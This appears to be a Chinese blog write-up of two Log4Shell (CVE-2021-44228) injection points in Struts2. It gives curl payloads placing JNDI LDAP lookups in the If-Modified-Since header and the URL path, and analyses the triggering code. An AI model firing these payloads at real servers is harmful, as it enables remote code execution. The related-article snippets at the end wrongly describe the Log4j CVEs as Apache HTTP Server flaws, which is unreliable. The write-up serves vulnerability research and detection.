Struts2 CVE-2021-44228 log4j POC

最新推荐文章于 2024-04-21 09:40:22 发布
最新推荐文章于 2024-04-21 09:40:22 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: exp 文章标签: log4j log4j2 poc CVE-2021-44228 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cch139745/article/details/122194878
版权

文章目录

前言

随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的可利用点。

一、第一个利用点poc

curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js

代码分析

Struts2 framework 存在一些各种UI组件的静态文件,管理这些的是DefaultStaticContentLoader类,以下为漏洞触发点代码:

protected void process(InputStream is, String path, HttpServletRequest request, HttpServletResponse response) throws IOException {
  if (is != null) {
      Calendar cal = Calendar.getInstance();

      // check for if-modified-since, prior to any other headers
      long ifModifiedSince = 0;
      try {
          ifModifiedSince = request.getDateHeader("If-Modified-Since");
      } catch (Exception e) {
          LOG.warn("Invalid If-Modified-Since header value: '{}', ignoring", request.getHeader("If-Modified-Since"));
      }

可以发现我们通过设置If-Modified-Since即可利用log4j漏洞,目前可利用的静态文件:

  • tooltip.gif
  • domtt.css
  • utils.js
  • domTT.js
  • inputtransfersselect.js
  • optiontransferselect.js

二、第二个利用点poc

curl -vv http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

代码分析

代码触发点在DefaultActionMapper类文件,这个类尝试解析URI后调用对应的action。

protected String cleanupNamespaceName(final String rawNamespace) {
  if (allowedNamespaceNames.matcher(rawNamespace).matches()) {
      return rawNamespace;
  } else {
      LOG.warn(
          "{} did not match allowed namespace names {} - default namespace {} will be used!",
          rawNamespace, allowedNamespaceNames, defaultNamespaceName
      );
      return defaultNamespaceName;
  }
}

但是还有一个问题就是tomcat会将//识别为/,这里就需要将payload进行转变,最后可以使用

$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

Github

我将上面的利用点编写了goby的扫描脚本,同时有大量最新安全漏洞poc,欢迎大家一起交流。
地址在:https://github.com/aetkrad/goby_poc

aetkrad
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2311
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。
手把手教你复现Log4j2漏洞,千万别中招!
Java知音
12-13 2179
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
探索Apache Log4j RCE POC:一款强大的安全检测工具
最新发布
gitblog_00066的博客
04-21 447
探索Apache Log4j RCE POC:一款强大的安全检测工具 项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc 在网络安全领域,漏洞检测和预防是至关重要的。这个项目——apache-log4j-rce-poc,是一个针对著名Apache Log4j 2.x框架的远程代码执行(RCE)漏洞的验证工具。它的目标是帮助开发者、系统管...
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5285
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 971
log4j 反序列化、远程代码执行漏洞
漏洞复现-Struts2-s2-057&&POC
qq_59350385的博客
05-17 1397
目录 环境搭建 复现工具 复现过程 (1)验证漏洞是否存在 (2)利用已有的POC(exp)复现 POC编写 PoC 编写流程 Poc编写涉及到的一些库 Web漏洞Poc编写基本方法 环境搭建 漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境: docker-compose up -d 访问:http://your-ip:8080/struts2-sho..
CVE-2021-21315-PoCCVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
2. `apache-log4j-2.12.4-bin.tar.gz`:这是适用于 Java 7 环境的 2.12.4 版本二进制包,包含了针对 CVE-2021-44228 的补丁。 3. `apache-log4j-2.3.2-bin.tar.gz`:这是适用于 Java 6 的 2.3.2 版本二进制包,同样...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
log4j_trunctate_poc:poc 测试如何截断堆栈跟踪
06-05
log4j_trunctate_poc poc 测试如何截断堆栈跟踪 介绍 Log4j 从 1.2.16 开始附带一个EnhancedPatternLayout类。 EnhancedPatternLayout能够截断堆栈跟踪消息,因此它们不会填满日志文件。 要启用此功能,对于每个输出,您需要修改从PatternLayout到EnhancedPatternLayout switch,并向ConversionPattern添加一个额外的标志。 作为一个例子改变这个: log4j.appender.CONSOLE.layout=org.apache.log4j.EnhancedPatternLayout log4j.appender.CONSOLE.layout.ConversionPattern=%-4r [%t] %-5p %c %x \u2013 %m%n %throwable
Spring boot整合log4j2过程解析
08-25
主要介绍了Spring boot整合log4j2过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7571
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
最详细的Log4J使用教程
热门推荐
路漫漫其修远兮
03-11 24万+
地址:http://www.codeceo.com/log4j-usage.html 日志是应用软件中不可缺少的部分,Apache的开源项目log4j是一个功能强大的日志组件,提供方便的日志记录。在apache网站:jakarta.apache.org/log4j可以免费下载到Log4j最新版本的软件包。 一、入门实例 1.新建一个JAva工程,导入包log4j-1.2.17.jar,整个...
log4j CVE-2019-17571 漏洞复现
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
【研究】Struts2漏洞之S2-005漏洞环境和POC
god_Zeo的安全博客
07-01 2070
【研究】Struts2漏洞之S2-005漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本...
Log4j输出格式控制
迷失在爪哇世界中的专栏
09-23 1182
参数 说明 例子 %c 列出logger名字空间的全称,如果加上{<层数>}表示列出从最内层算起的指定层数的名字空间 log4j配置文件参数举例 输出显示媒介 假设当前logger名字空间是"a.b.c" %c a.b.c %c{2} b.c %20c (若名字空间长度小于20,则左边用空格填充) %-20c (若名字空间长度小于20,则...
记一次struts2.3升级到struts2.5
u011921396的专栏
04-10 1346
最严重的问题是,框架获取不到url中的action name,错误提示如下:There is no Action mapped for namespace / and action name[index]莫名其妙的index,然后我debug断点跟踪,后来发现了问题,先放上struts2-core中DefaultActionMapper.class中设置mapping中name的方法对比版本2.3...
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值